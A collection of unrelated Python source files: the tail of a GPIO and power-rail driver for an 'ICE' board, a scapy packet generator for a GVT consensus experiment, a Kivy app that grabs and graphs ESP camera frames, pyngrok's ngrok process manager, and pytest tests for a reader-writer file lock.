(mask >> 16) & 0xff,
(mask >> 8) & 0xff,
mask & 0xff))
@min_proto_version("0.2")
@capability('g')
def gpio_set_direction_0_2(self, gpio_idx, direction):
mask = self._gpio_get_direction_0_2()
if direction == ICE.GPIO_OUTPUT:
mask |= (1 << gpio_idx)
elif direction in (ICE.GPIO_INPUT, ICE.GPIO_TRISTATE):
mask &= ~(1 << gpio_idx)
else:
raise self.ParameterError("Illegal GPIO direction")
self.send_message_until_acked('g',
struct.pack('BBBB', ord('d'),
(mask >> 16) & 0xff,
(mask >> 8) & 0xff,
mask & 0xff))
@min_proto_version("0.2")
@capability('G')
def gpio_get_interrupt_enable_mask(self):
resp = self.send_message_until_acked('G', struct.pack('B', ord('i')))
if len(resp) != 3:
raise self.FormatError("Bad response from `Gi':" + str(resp))
high,mid,low = list(map(ord, resp))
return low | (mid << 8) | (high << 16)
@min_proto_version("0.2")
@capability('g')
def gpio_set_interrupt_enable_mask(self, mask):
self.send_message_until_acked('g',
struct.pack('BBBB', ord('i'),
(mask >> 16) & 0xff,
(mask >> 8) & 0xff,
mask & 0xff))
## POWER ##
POWER_0P6 = 0
POWER_1P2 = 1
POWER_VBATT = 2
POWER_GOC = 3
POWER_0P6_DEFAULT = 0.675
POWER_1P2_DEFAULT = 1.2
POWER_VBATT_DEFAULT = 3.8
@min_proto_version("0.1")
@capability('P')
def power_get_voltage(self, rail):
'''
Query the current voltage setting of a power rail.
The `rail' argument must be one of:
ICE.POWER_0P6
ICE.POWER_1P2
ICE.POWER_VBATT
'''
if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT):
raise self.ParameterError("Invalid rail: " + str(rail))
logger.warn("ICE Firmware <= 0.3 cannot query voltage. Returning cached value.")
try:
raw = getattr(self, 'power_{}'.format(rail))
except AttributeError:
logger.warn("No cached value, returning default")
raw = (1 - 0.537) / 0.0185
#resp = self.send_message_until_acked('P', struct.pack("BB", ord('v'), rail))
#if len(resp) != 2:
# raise self.FormatError, "Wrong response length from `Pv#':" + str(resp)
#rail, raw = struct.unpack("BB", resp)
# Vout = (0.537 + 0.0185 * v_set) * Vdefault
default_voltage = (ICE.POWER_0P6_DEFAULT, ICE.POWER_1P2_DEFAULT,
ICE.POWER_VBATT_DEFAULT)[rail]
vout = (0.537 + 0.0185 * raw) * default_voltage
return vout
@min_proto_version("0.1")
@capability('P')
def power_get_onoff(self, rail):
'''
Query the current on/off setting of a power rail.
Returns a boolean, on=True.
'''
if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT, ICE.POWER_GOC):
raise self.ParameterError("Invalid rail: " + str(rail))
resp = self.send_message_until_acked('P', struct.pack("BB", ord('o'), rail))
if len(resp) != 1:
raise self.FormatError("Too long of a response from `Po#':" + str(resp))
onoff = struct.unpack("B", resp)[0]
return bool(onoff)
@min_proto_version("0.1")
@capability('p')
def power_set_voltage(self, rail, output_voltage):
'''
Set the voltage setting of a power rail. Units are V.
'''
if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT):
raise self.ParameterError("Invalid rail: " + str(rail))
# Vout = (0.537 + 0.0185 * v_set) * Vdefault
output_voltage = float(output_voltage)
default_voltage = (ICE.POWER_0P6_DEFAULT, ICE.POWER_1P2_DEFAULT,
ICE.POWER_VBATT_DEFAULT)[rail]
vset = ((output_voltage / default_voltage) - 0.537) / 0.0185
vset = int(vset)
if (vset < 0) or (vset > 255):
raise self.ParameterError("Voltage exceeds range. vset: " + str(vset))
self.send_message_until_acked('p', struct.pack("BBB", ord('v'), rail, vset))
setattr(self, 'power_{}'.format(rail), vset)
@min_proto_version("0.1")
@capability('p')
def power_set_onoff(self, rail, onoff):
'''
Turn a power rail on or off (on=True).
'''
if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT, ICE.POWER_GOC):
raise self.ParameterError("Invalid rail: " + str(rail))
self.send_message_until_acked('p', struct.pack("BBB", ord('o'), rail, onoff))
if __name__ == '__main__':
logger.setLevel(level=logging.DEBUG)
|
proposal_generator.py | #!/usr/bin/env python
import argparse
import sys
import socket
import random
import struct
import threading
import time
import thread
import json
from scapy.all import sendp, send, get_if_list, get_if_hwaddr
from scapy.all import Packet
from scapy.all import Ether, IP, UDP, TCP
from proposalHeader import GvtProtocol
from receive import *
TYPE_PROP = 0x1919
TYPE_REQ = 0x1515
TYPE_GVT = 0x600
TYPE_DEL = 0x1313
TYPE_PREPARE = 0x3333
TYPE_PREPAREOK = 0x4444
TYPE_STARTCHANGE = 0x4343
TYPE_STARTVIEW = 0x4747
TYPE_FAILURE = 0x5555
TYPE_DELFAILURE = 0x6666
TYPE_VIEWCHANGE = 0x700
TYPE_RESENDPROP = 0x1919
class gvtControl:
def __init__(self, dest_ip, pid):
#creates socket to a destination
self.addr = socket.gethostbyname(dest_ip)
self.iface = self.get_if()
self.pid = pid
self.dest_ip = dest_ip
self.GVT_value = 0
self.last_proposal = 0
self.last_proposal_time = 0
self.leader_alive = 1
self.sent_but_not_yet_acknowledged = 0
#interfaces
self.f = open("demofile.txt", "w")
self.queue = []
#start receiver thread
self.receivethread = threading.Thread(target=self.receiveThread)
self.receivethread.start()
#just for debugging
#start run loop
self.run_loop = threading.Thread(target=self.runThread)
self.run_loop.start()
self.send = threading.Thread(target=self.send_queue)
self.send.start()
def receiveThread(self):
#ifaces = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))
#iface = ifaces[0]
print "sniffing on %s" % self.iface
sys.stdout.flush()
sniff(iface = self.iface, prn = lambda x: self.handle_pkt(x))
#TODO: Change this interface after the failure
def handle_pkt(self, pkt):
if TCP in pkt and pkt[TCP].dport == 1234:
print "got a packet"
#pkt.show2()
# hexdump(pkt)
sys.stdout.flush()
self.proposal = json.loads(pkt.load)
self.key = self.proposal.keys()
self.GVT_value = self.proposal[self.key[0]]
print "got new value: " + str(self.GVT_value)
update_time = time.time() - self.last_proposal_time
print("time: " + str(update_time)) #just work for new experiments
self.f.write(str(update_time) + "\n")
#acknowledges the message_value
if self.GVT_value == self.sent_but_not_yet_acknowledged:
self.sent_but_not_yet_acknowledged = 0
self.f.flush()
def resend_old_messages(self):
#so esta mandando uma mensagem no momento
#TODO: armazenar e reenviar todas as mensagens da aplicacao
if(self.sent_but_not_yet_acknowledged):
self.send_packet(message_value=int(self.sent_but_not_yet_acknowledged), process_pid=self.pid)
def get_if(self):
self.ifs=get_if_list()
iface=None # "h1-eth0"
for i in get_if_list():
if "eth0" in i:
iface=i
break;
if not iface:
print "Cannot find eth0 interface"
exit(1)
self.ifs.remove('lo')
self.ifs.remove('eth0')
print(self.ifs)
return iface
def send_packet(self, message_value, process_pid):
self.payload = {}
self.payload[process_pid] = message_value
pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type = 0x800)
pkt = pkt /IP(dst=self.addr) / TCP(dport=7777, sport=random.randint(49152,65535))/ json.dumps(self.payload)
sendp(pkt, iface=self.iface, verbose=False)
def build_proposal(self, proposal_value):
self.last_proposal = int(proposal_value)
self.send_packet(message_value=int(proposal_value), process_pid=self.pid)
#this thread implements a run loop. Just for writing LVT values as a debug functionality
#this thread implements a run loop. Just for writing LVT values as a debug functionality
def runThread(self):
value = 1
while True:
#0.1 ---- 1 ------ 100
time.sleep(3)
print "sending on interface %s to %s" % (self.iface, str(self.addr))
#TODO: We need to enforce the concurrency control here
self.queue.append([value, time.time()])
value = value + 1
def send_queue(self):
#TODO: concurrency control
while True:
if(self.sent_but_not_yet_acknowledged == 0 and len(self.queue) > 0):
get = self.queue.pop(0)
self.sent_but_not_yet_acknowledged = get[0]
print self.sent_but_not_yet_acknowledged
self.last_proposal_time = get[1]
self.build_proposal(proposal_value=self.sent_but_not_yet_acknowledged)
def main():
if len(sys.argv)<3:
#TODO: Does not make sense this Dest IP. Solve it
print 'pass 2 arguments: <destination_ip> <pid>'
exit(1)
GVTcontrol_instance = gvtControl(sys.argv[1], int(sys.argv[2]))
if __name__ == '__main__':
main()
|
main.py | import kivy
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.widget import Widget
from kivy.uix.image import Image, AsyncImage
from kivy.uix.label import Label
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.properties import ObjectProperty
from kivy.properties import BooleanProperty
from kivy.loader import Loader
from kivy.clock import Clock
import time
import urllib.request
import numpy
import os
from kivy.network.urlrequest import UrlRequest
from functools import partial
from kivy_garden.graph import Graph, MeshLinePlot, BarPlot
from threading import Thread
from PIL import Image, ImageStat, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
# If ESP is hosting
# Name: I-SEE-YOU
# Pass: yeetyeet
# IP: 192.168.4.1
capUrl = 'http://192.168.4.1/capture'
# capUrl = 'http://192.168.1.189/capture'
# capUrl = 'https://www.neenahpaper.com/-/media/images/storefront/chips/environment-papers/environment-papers-ultra-bright-white-smooth.ashx'
capimg = kivy.uix.image.Image(source="images/capture.png")
logs = 0
times = []
sched_val = 0.265
ex_avg = 0
cap_cnt = 0
fps_val = 0
class ButtonTest(Widget):
pass
def get_brightness_level():
global levels
while True:
mx = 99
if len(levels) >= 300:
levels = []
levels.append(mx)
def get_brightness():
global levels
im = Image.open("images\capture.png").convert('L')
stat = ImageStat.Stat(im)
if len(levels) >= 300:
levels = []
levels.append(stat.rms[0])
print("--- %s bright ---" % stat.rms[0])
def imagegrabhandler(self, *args):
start = time.time()
imagegrab(self, start)
update(self)
def imagegrab(self, start, *args):
global cap_cnt
global ex_avg
global fps_val
urllib.request.urlretrieve(
capUrl, "images\capture.png")
times.append(time.time() - start)
print("--- %s seconds ---" % (times[-1]))
cap_cnt += 1
ex_avg = numpy.format_float_positional(numpy.mean(times), precision=5)
fps_val = numpy.format_float_positional(1 / (numpy.mean(times) + sched_val), precision=2)
get_brightness()
def update(self):
capimg.reload()
class Progress(Screen):
pass
class LayoutTest(BoxLayout):
your_time = StringProperty()
img = ObjectProperty()
count = StringProperty()
exavg = StringProperty()
fps = StringProperty()
exint = StringProperty()
highinten = StringProperty()
lowinten = StringProperty()
log1min = StringProperty()
log1max = StringProperty()
log2min = StringProperty()
log2max = StringProperty()
isShownStats = BooleanProperty(True)
isShownLog = BooleanProperty(False)
isShownMenu = BooleanProperty(False)
isCapture = BooleanProperty(False)
def __init__(self, **kwargs):
super(LayoutTest, self).__init__(**kwargs)
self.orientation = "vertical"
self.padding = 10
self.img.source = "images\default.png"
self.plot = MeshLinePlot(color=[1, 0, 0, 1])
Clock.schedule_interval(self.set_time, 0.1)
def logdata(self):
global logs
if len(levels) > 1:
if logs == 0:
self.log1max = str(round(max(levels)))
self.log1min = str(round(min(levels)))
logs = 1
else:
self.log2max = str(round(max(levels)))
self.log2min = str(round(min(levels)))
logs = 0
def start_capture(self):
self.ids.graph.add_plot(self.plot)
Clock.schedule_interval(self.get_value, 0.325)
imagegrabhandler(self)
Clock.schedule_interval(imagegrabhandler, sched_val)
Clock.schedule_once(self.switch, sched_val + 0.1)
Clock.schedule_interval(self.refresh, sched_val)
Clock.schedule_interval(self.stat, 0.5)
def stop_capture(self):
self.switch(0)
# WOOOOOEE THERE, maybe don't use these slow methods
Clock.unschedule(imagegrabhandler)
Clock.unschedule(self.refresh)
Clock.unschedule(self.get_value)
Clock.unschedule(self.stat)
def stat(self, dt):
self.count = str(cap_cnt)
self.exavg = str(ex_avg)
self.fps = str(fps_val)
self.exint = str(sched_val)
def get_value(self, dt):
self.plot.points = [(i/2, j) for i, j in enumerate(levels)]
if len(levels) > 1:
self.highinten = str(round(max(levels)))
self.lowinten = str(round(min(levels)))
def set_time(self, dt):
self.your_time = time.strftime("%m/%d/%Y - %I:%M %p")
def switch(self, val):
if val:
self.img.source = "images\capture.png"
else:
self.img.source = "images\default.png"
def refresh(self, bruh_why_am_i_here):
self.img.reload()
def clear_values(self):
global levels
levels = []
self.plot.points = [(i / 2, j) for i, j in enumerate(levels)]
self.count = str(0)
self.exavg = str(0)
self.fps = str(0)
self.exint = str(0)
self.lowinten = str(0)
self.highinten = str(0)
self.log1max = str(0)
self.log1min = str(0)
self.log2max = str(0)
self.log2min = str(0)
class FASSPRAppa(App):
def build(self):
root = LayoutTest()
# root.add_widget(ButtonTest())
# ImageTest().sched()
return root
def run_cap(self, *args):
for i in range(10):
r = UrlRequest("http://192.168.1.189/capture", on_success=partial(self.update_label, i))
print(i)
def update_label(self, i, *args):
print(i)
## --------------------------------------------------------------------------------------------------------------------
import itertools
from kivy.utils import get_color_from_hex as rgb
colors = itertools.cycle([rgb('7dac9f'), rgb('dc7062'), rgb('66a8d4'), rgb('e5b060')])
class SASSPRRoot(BoxLayout):
img = ObjectProperty()
# def __init__(self, **kwargs):
# super().__init__(**kwargs)
def showtest(self):
self.clear_widgets()
self.img = Testy()
self.add_widget(self.img)
class Testy(BoxLayout):
ree = ObjectProperty
class List(BoxLayout):
but = ObjectProperty()
class Main(Screen):
img = ObjectProperty()
isShownMenu = BooleanProperty(False)
isShownStats = BooleanProperty(True)
isCaptureOn = BooleanProperty(False)
isShownGraph = BooleanProperty(False)
your_time = StringProperty()
count = StringProperty()
exavg = StringProperty()
fps = StringProperty()
exint = StringProperty()
def __init__(self, **kwargs):
super(Main, self).__init__(**kwargs)
self.img.source = "images\default.png"
def reset_plots(self, graph):
for plot in self.plot:
plot.bind_to_graph(graph)
plot.points = []
def start_capture(self):
self.ids.graph.add_plot(self.plot)
Clock.schedule_interval(self.get_value, 0.325)
imagegrabhandler(self)
Clock.schedule_interval(imagegrabhandler, sched_val)
Clock.schedule_once(self.switch, sched_val + 0.1)
Clock.schedule_interval(self.refresh, sched_val)
Clock.schedule_interval(self.stat, 0.5)
def stop_capture(self):
self.switch(0)
# WOOOOOEE THERE, maybe don't use these slow methods
Clock.unschedule(imagegrabhandler)
Clock.unschedule(self.refresh)
Clock.unschedule(self.get_value)
Clock.unschedule(self.stat)
def stat(self, dt):
self.count = str(cap_cnt)
self.exavg = str(ex_avg)
self.fps = str(fps_val)
self.exint = str(sched_val)
def switch(self, val):
if val:
self.img.source = "images\capture.png"
else:
self.img.source = "images\default.png"
def refresh(self, bruh_why_am_i_here):
self.img.reload()
def get_value(self, dt):
self.plot.points = [(i/2, j) for i, j in enumerate(levels)]
class FASSPRApp(App):
def build(self):
return LayoutTest()
if __name__ == '__main__':
levels = []
# get_level_thread = Thread(target=get_brightness_level)
# get_level_thread.daemon = True
FASSPRApp().run()
|
process.py | import atexit
import logging
import os
import shlex
import subprocess
import threading
import time
import yaml
from future.standard_library import install_aliases
from pyngrok import conf
from pyngrok.exception import PyngrokNgrokError, PyngrokSecurityError
from pyngrok.installer import validate_config
install_aliases()
from urllib.request import urlopen, Request
try:
from http import HTTPStatus as StatusCodes
except ImportError: # pragma: no cover
try:
from http import client as StatusCodes
except ImportError:
import httplib as StatusCodes
__author__ = "Alex Laird"
__copyright__ = "Copyright 2020, Alex Laird"
__version__ = "4.1.1"
logger = logging.getLogger(__name__)
_current_processes = {}
class NgrokProcess:
"""
An object containing information about the :code:`ngrok` process.
:var proc: The child process that is running :code:`ngrok`.
:vartype proc: subprocess.Popen
:var pyngrok_config: The :code:`pyngrok` configuration to use with :code:`ngrok`.
:vartype pyngrok_config: PyngrokConfig
:var api_url: The API URL for the :code:`ngrok` web interface.
:vartype api_url: str
:var logs: A list of the most recent logs from :code:`ngrok`, limited in size to :code:`max_logs`.
:vartype logs: list[NgrokLog]
:var startup_error: If :code:`ngrok` startup fails, this will be the log of the failure.
:vartype startup_error: str
"""
def __init__(self, proc, pyngrok_config):
self.proc = proc
self.pyngrok_config = pyngrok_config
self.api_url = None
self.logs = []
self.startup_error = None
self._tunnel_started = False
self._client_connected = False
self._monitor_thread = None
def __repr__(self):
return "<NgrokProcess: \"{}\">".format(self.api_url)
def __str__(self): # pragma: no cover
return "NgrokProcess: \"{}\"".format(self.api_url)
@staticmethod
def _line_has_error(log):
return log.lvl in ["ERROR", "CRITICAL"]
def _log_startup_line(self, line):
"""
Parse the given startup log line and use it to manage the startup state
of the :code:`ngrok` process.
:param line: The line to be parsed and logged.
:type line: str
:return: The parsed log.
:rtype: NgrokLog
"""
log = self._log_line(line)
if log is None:
return
elif self._line_has_error(log):
self.startup_error = log.err
else:
# Log `ngrok` startup states as they come in
if "starting web service" in log.msg and log.addr is not None:
self.api_url = "http://{}".format(log.addr)
elif "tunnel session started" in log.msg:
self._tunnel_started = True
elif "client session established" in log.msg:
self._client_connected = True
return log
def _log_line(self, line):
"""
Parse, log, and emit (if :code:`log_event_callback` in :class:`~pyngrok.conf.PyngrokConfig` is registered) the
given log line.
:param line: The line to be processed.
:type line: str
:return: The parsed log.
:rtype: NgrokLog
"""
log = NgrokLog(line)
if log.line == "":
return None
logger.log(getattr(logging, log.lvl), line)
self.logs.append(log)
if len(self.logs) > self.pyngrok_config.max_logs:
self.logs.pop(0)
if self.pyngrok_config.log_event_callback is not None:
self.pyngrok_config.log_event_callback(log)
return log
def healthy(self):
"""
Check whether the :code:`ngrok` process has finished starting up and is in a running, healthy state.
:return: :code:`True` if the :code:`ngrok` process is started, running, and healthy, :code:`False` otherwise.
:rtype: bool
"""
if self.api_url is None or \
not self._tunnel_started or not self._client_connected:
return False
if not self.api_url.lower().startswith("http"):
raise PyngrokSecurityError("URL must start with \"http\": {}".format(self.api_url))
# Ensure the process is available for requests before registering it as healthy
request = Request("{}/api/tunnels".format(self.api_url))
response = urlopen(request)
if response.getcode() != StatusCodes.OK:
return False
return self.proc.poll() is None and \
self.startup_error is None
def _monitor_process(self):
while self.pyngrok_config.monitor_thread and self.proc.poll() is None:
self._log_line(self.proc.stdout.readline())
self._monitor_thread = None
def start_monitor_thread(self):
"""
Start a thread that will monitor the :code:`ngrok` process and its logs until it completes.
If a monitor thread is already running, nothing will be done.
"""
if self._monitor_thread is None:
self._monitor_thread = threading.Thread(target=self._monitor_process)
self._monitor_thread.start()
def stop_monitor_thread(self):
"""
Set the monitor thread to stop monitoring the :code:`ngrok` process after the next log event. This will not
necessarily terminate the thread immediately, as the thread may currently be idle, rather it sets a flag
on the thread telling it to terminate the next time it wakes up.
This has no impact on the :code:`ngrok` process itself, only :code:`pyngrok`'s monitor of the process and
its logs.
"""
if self._monitor_thread is not None:
self.pyngrok_config.monitor_thread = False
class NgrokLog:
"""
An object containing a parsed log from the :code:`ngrok` process.
:var line: The raw, unparsed log line.
:vartype line: str
:var t: The log's ISO 8601 timestamp.
:vartype t: str
:var lvl: The log's level.
:vartype lvl: str
:var msg: The log's message.
:vartype msg: str
:var err: The log's error, if applicable.
:vartype err: str
:var addr: The URL, if :code:`obj` is "web".
:vartype addr: str
"""
def __init__(self, line):
self.line = line.strip()
self.t = None
self.lvl = None
self.msg = None
self.err = None
self.addr = None
for i in shlex.split(self.line):
if "=" not in i:
continue
key, value = i.split("=")
if key == "lvl":
value = value.upper()
if value == "CRIT":
value = "CRITICAL"
elif value in ["ERR", "EROR"]:
value = "ERROR"
elif value == "WARN":
value = "WARNING"
setattr(self, key, value)
def __repr__(self):
return "<NgrokLog: t={} lvl={} msg=\"{}\">".format(self.t, self.lvl, self.msg)
def __str__(self): # pragma: no cover
attrs = [attr for attr in dir(self) if not attr.startswith("_") and getattr(self, attr) is not None]
attrs.remove("line")
return " ".join("{}=\"{}\"".format(attr, getattr(self, attr)) for attr in attrs)
def set_auth_token(pyngrok_config, token):
"""
Set the :code:`ngrok` auth token in the config file, enabling authenticated features (for instance,
more concurrent tunnels, custom subdomains, etc.).
:param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
:type pyngrok_config: PyngrokConfig
:param token: The auth token to set.
:type token: str
"""
start = [pyngrok_config.ngrok_path, "authtoken", token, "--log=stdout"]
if pyngrok_config.config_path:
start.append("--config={}".format(pyngrok_config.config_path))
result = subprocess.check_output(start)
if "Authtoken saved" not in str(result):
raise PyngrokNgrokError("An error occurred when saving the auth token: {}".format(result))
def get_process(pyngrok_config):
"""
Retrieve the current :code:`ngrok` process for the given config's :code:`ngrok_path`.
If :code:`ngrok` is not running, calling this method will first start a process with
:class:`~pyngrok.conf.PyngrokConfig`.
:param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
:type pyngrok_config: PyngrokConfig
:return: The :code:`ngrok` process.
:rtype: NgrokProcess
"""
if pyngrok_config.ngrok_path in _current_processes:
# Ensure the process is still running and hasn't been killed externally
if _current_processes[pyngrok_config.ngrok_path].proc.poll() is None:
return _current_processes[pyngrok_config.ngrok_path]
else:
_current_processes.pop(pyngrok_config.ngrok_path, None)
return _start_process(pyngrok_config)
def run_process(ngrok_path, args):
"""
Start a blocking :code:`ngrok` process with the given args.
:param ngrok_path: The path to the :code:`ngrok` binary.
:type ngrok_path: str
:param args: The args to pass to :code:`ngrok`.
:type args: list[str]
"""
_ensure_path_ready(ngrok_path)
start = [ngrok_path] + args
subprocess.call(start)
def kill_process(ngrok_path):
"""
Terminate the :code:`ngrok` processes, if running, for the given path. This method will not block, it will just
issue a kill request.
:param ngrok_path: The path to the :code:`ngrok` binary.
:type ngrok_path: str
"""
if ngrok_path in _current_processes:
ngrok_process = _current_processes[ngrok_path]
logger.info("Killing ngrok process: {}".format(ngrok_process.proc.pid))
try:
ngrok_process.proc.kill()
except OSError as e:
# If the process was already killed, nothing to do but cleanup state
if e.errno != 3:
raise e
_current_processes.pop(ngrok_path, None)
else:
logger.debug("\"ngrok_path\" {} is not running a process".format(ngrok_path))
def _ensure_path_ready(ngrok_path):
"""
Ensure the binary for :code:`ngrok` at the given path is ready to be started, raise a relevant
exception if not.
:param ngrok_path: The path to the :code:`ngrok` binary.
"""
if not os.path.exists(ngrok_path):
raise PyngrokNgrokError(
"ngrok binary was not found. Be sure to call \"ngrok.ensure_ngrok_installed()\" first for "
"\"ngrok_path\": {}".format(ngrok_path))
if ngrok_path in _current_processes:
raise PyngrokNgrokError("ngrok is already running for the \"ngrok_path\": {}".format(ngrok_path))
def _validate_config(config_path):
with open(config_path, "r") as config_file:
config = yaml.safe_load(config_file)
if config is not None:
validate_config(config)
def _terminate_process(process):
if process is None:
return
try:
process.terminate()
except OSError:
logger.debug("ngrok process already terminated: {}".format(process.pid))
def _start_process(pyngrok_config):
"""
Start a :code:`ngrok` process with no tunnels. This will start the :code:`ngrok` web interface, against
which HTTP requests can be made to create, interact with, and destroy tunnels.
:param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
:type pyngrok_config: PyngrokConfig
:return: The :code:`ngrok` process.
:rtype: NgrokProcess
"""
_ensure_path_ready(pyngrok_config.ngrok_path)
if pyngrok_config.config_path is not None:
_validate_config(pyngrok_config.config_path)
else:
_validate_config(conf.DEFAULT_NGROK_CONFIG_PATH)
start = [pyngrok_config.ngrok_path, "start", "--none", "--log=stdout"]
if pyngrok_config.config_path:
logger.info("Starting ngrok with config file: {}".format(pyngrok_config.config_path))
start.append("--config={}".format(pyngrok_config.config_path))
if pyngrok_config.auth_token:
logger.info("Overriding default auth token")
start.append("--authtoken={}".format(pyngrok_config.auth_token))
if pyngrok_config.region:
logger.info("Starting ngrok in region: {}".format(pyngrok_config.region))
start.append("--region={}".format(pyngrok_config.region))
proc = subprocess.Popen(start, stdout=subprocess.PIPE, universal_newlines=True)
atexit.register(_terminate_process, proc)
logger.info("ngrok process starting: {}".format(proc.pid))
ngrok_process = NgrokProcess(proc, pyngrok_config)
_current_processes[pyngrok_config.ngrok_path] = ngrok_process
timeout = time.time() + pyngrok_config.startup_timeout
while time.time() < timeout:
line = proc.stdout.readline()
ngrok_process._log_startup_line(line)
if ngrok_process.healthy():
logger.info("ngrok process has started: {}".format(ngrok_process.api_url))
if pyngrok_config.monitor_thread:
ngrok_process.start_monitor_thread()
break
elif ngrok_process.startup_error is not None or \
ngrok_process.proc.poll() is not None:
break
if not ngrok_process.healthy():
# If the process did not come up in a healthy state, clean up the state
kill_process(pyngrok_config.ngrok_path)
if ngrok_process.startup_error is not None:
raise PyngrokNgrokError("The ngrok process errored on start: {}.".format(ngrok_process.startup_error),
ngrok_process.logs,
ngrok_process.startup_error)
else:
raise PyngrokNgrokError("The ngrok process was unable to start.", ngrok_process.logs)
return ngrok_process
|
test_lock.py | """
Adapted from https://github.com/harlowja/fasteners/
"""
import itertools
import os
import random
import tempfile
import time
from multiprocessing import Process
from pathlib import Path
import more_itertools
import pytest
from diskcache import Cache
from diskcache import Deque
# noinspection PyProtectedMember
from pathos.pools import _ProcessPool as ProcessPool
from filedb.lock import FileLocked
from filedb.lock import ReaderWriterLock
PROCESS_COUNT = 20
class StopWatch(object):
"""A really basic stop watch."""
def __init__(self, duration=None):
self.duration = duration
self.started_at = None
self.stopped_at = None
def leftover(self):
if self.duration is None:
return None
return max(0.0, self.duration - self.elapsed())
def elapsed(self):
if self.stopped_at is not None:
end_time = self.stopped_at
else:
end_time = time.monotonic()
return max(0.0, end_time - self.started_at)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.stopped_at = time.monotonic()
def start(self):
self.started_at = time.monotonic()
self.stopped_at = None
def expired(self):
if self.duration is None:
return False
else:
return self.elapsed() > self.duration
@pytest.fixture()
def disk_cache_dir():
with tempfile.TemporaryDirectory() as disk_cache_dir:
yield disk_cache_dir
@pytest.fixture()
def lock_dir():
with tempfile.TemporaryDirectory() as disk_cache_dir:
yield disk_cache_dir
def test_doesnt_hang(lock_dir, disk_cache_dir):
def chaotic_locker(type_):
lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
ReaderWriterLock(lock_dir).read_lock)
with lock():
with Cache(disk_cache_dir) as dc_:
dc_.incr(type_)
pool = ProcessPool(PROCESS_COUNT)
pool.map(chaotic_locker, ['r'] * 10 + ['w'] * 10)
with Cache(disk_cache_dir) as dc:
assert dc.get('w') == 10
assert dc.get('r') == 10
def test_no_double_writers(disk_cache_dir, lock_dir):
watch = StopWatch(duration=5)
watch.start()
def acquire_check(dc_):
with ReaderWriterLock(lock_dir).write_lock(timeout=None):
if dc_.get('active_count', 0) >= 1:
dc_.incr('dups_count')
dc_.incr('active_count')
time.sleep(random.random() / 100)
dc_.decr('active_count')
dc_.incr('visited_count')
def run(_):
with Cache(disk_cache_dir) as dc_:
while not watch.expired():
acquire_check(dc_)
pool = ProcessPool(PROCESS_COUNT)
pool.map(run, [() for _ in range(PROCESS_COUNT)], chunksize=1)
with Cache(disk_cache_dir) as dc:
assert dc.get('active_count') == 0
assert dc.get('dups_count', default=0) == 0
assert dc.get('visited_count') > 100
def test_no_concurrent_readers_writers(disk_cache_dir, lock_dir):
watch = StopWatch(duration=5)
watch.start()
def acquire_check(dc_, reader):
if reader:
lock_func = ReaderWriterLock(lock_dir).read_lock
else:
lock_func = ReaderWriterLock(lock_dir).write_lock
with lock_func(timeout=None):
if not reader:
if dc_.get('active_count', 0) >= 1:
dc_.incr('dups_count')
dc_.incr('active_count')
time.sleep(random.random() / 100)
dc_.decr('active_count')
dc_.incr('visited_count')
def run(_):
with Cache(disk_cache_dir) as dc_:
while not watch.expired():
acquire_check(dc_, random.choice([True, False]))
pool = ProcessPool(PROCESS_COUNT)
pool.map(run, [() for _ in range(PROCESS_COUNT)], chunksize=1)
with Cache(disk_cache_dir) as dc:
assert dc.get('active_count') == 0
assert dc.get('dups_count', default=0) == 0
assert dc.get('visited_count') > 10
def test_writer_releases_lock_upon_crash(lock_dir, disk_cache_dir):
def lock_(i, crash):
with ReaderWriterLock(lock_dir).write_lock(timeout=5):
with Cache(disk_cache_dir) as dc_:
dc_.set(f'pid{i}', os.getpid())
if crash:
raise RuntimeError('')
p1 = Process(target=lock_, args=(1, True))
p2 = Process(target=lock_, args=(2, False))
p1.start()
p1.join()
p2.start()
p2.join()
with Cache(disk_cache_dir) as dc:
assert dc.get('pid1') != dc.get('pid2')
assert p1.exitcode != 0
assert p2.exitcode == 0
def test_reader_releases_lock_upon_crash(lock_dir, disk_cache_dir):
def read_lock_and_crash(i):
with ReaderWriterLock(lock_dir).read_lock():
with Cache(disk_cache_dir) as dc_:
dc_.set(f'pid{i}', os.getpid())
raise RuntimeError('')
def write_lock(i):
with ReaderWriterLock(lock_dir).write_lock(timeout=5):
with Cache(disk_cache_dir) as dc_:
dc_.set(f'pid{i}', os.getpid())
p1 = Process(target=read_lock_and_crash, args=(1,))
p2 = Process(target=write_lock, args=(2,))
p1.start()
p1.join()
p2.start()
p2.join()
with Cache(disk_cache_dir) as dc:
assert dc.get('pid1') != dc.get('pid2')
assert p1.exitcode != 0
assert p2.exitcode == 0
def test_reader_writer_chaotic(lock_dir, disk_cache_dir):
def chaotic_locker(type_, blow_up):
lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
ReaderWriterLock(lock_dir).read_lock)
with lock():
with Cache(disk_cache_dir) as dc_:
dc_.incr(type_)
if blow_up:
raise RuntimeError()
pool = ProcessPool(PROCESS_COUNT)
users = list(more_itertools.ncycles(itertools.product(['r', 'w'], [True, False]), 10))
random.shuffle(users)
with pytest.raises(RuntimeError):
pool.starmap(chaotic_locker, users)
with Cache(disk_cache_dir) as dc:
assert dc.get('w') == 20
assert dc.get('r') == 20
def test_reader_to_writer(lock_dir):
lock = ReaderWriterLock(lock_dir)
with lock.read_lock(timeout=1):
with lock.write_lock(timeout=1):
pass
@pytest.mark.skip('Not supported!')
def test_reader_to_reader(lock_dir):
lock = ReaderWriterLock(lock_dir)
with lock.read_lock(timeout=1):
with lock.read_lock(timeout=1):
pass
